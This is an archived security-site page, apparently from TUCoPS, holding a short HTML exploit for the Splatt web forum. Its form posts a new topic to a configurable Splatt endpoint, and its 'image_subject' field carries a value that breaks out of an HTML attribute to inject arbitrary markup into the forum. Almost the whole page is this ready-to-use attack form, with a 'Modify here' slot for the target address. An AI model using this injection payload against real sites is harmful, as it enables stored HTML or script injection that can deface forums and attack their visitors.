TUCoPS :: Web BBS :: etc :: splatt.htm Splatt - inject html code exploit

<html>
<body>
<script>
<!-- Modify here -->
var address='http://www.splatt.it/gate.html?mop=modload&name=Forums&file=newtopic';
</script>

<!-- Exploit form -->
<script>
document.write("<form action="+address+" method='post' name='coolsus'>");
</script>
Numero forum: <input type=text name=forum value=1 size=3><br>
Username: <input CLASS=textbox TYPE="TEXT" NAME="username" SIZE="25" MAXLENGTH="40"><br>
Password: <input CLASS=textbox TYPE="PASSWORD" NAME="password" SIZE="25" MAXLENGTH="25"><br>
Soggetto: <input CLASS=textbox TYPE="TEXT" NAME="subject" SIZE="75" MAXLENGTH="75"><br>
Messaggio:<br><textarea name="message" rows="10" cols="75" wrap="VIRTUAL"></textarea><br>
<input type=hidden name=bbcode value=0>
<input type=hidden name=smile value=0>
<input type=hidden name=notify value=0>
<b>Inject code:</b> <input type=text name=image_subject value='icon1.gif">HTML CODE<!-- "' size=100><br>
<input type="submit" name="submit" value=Invia class="Button">
</form>
</body>
</html>

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2024 AOH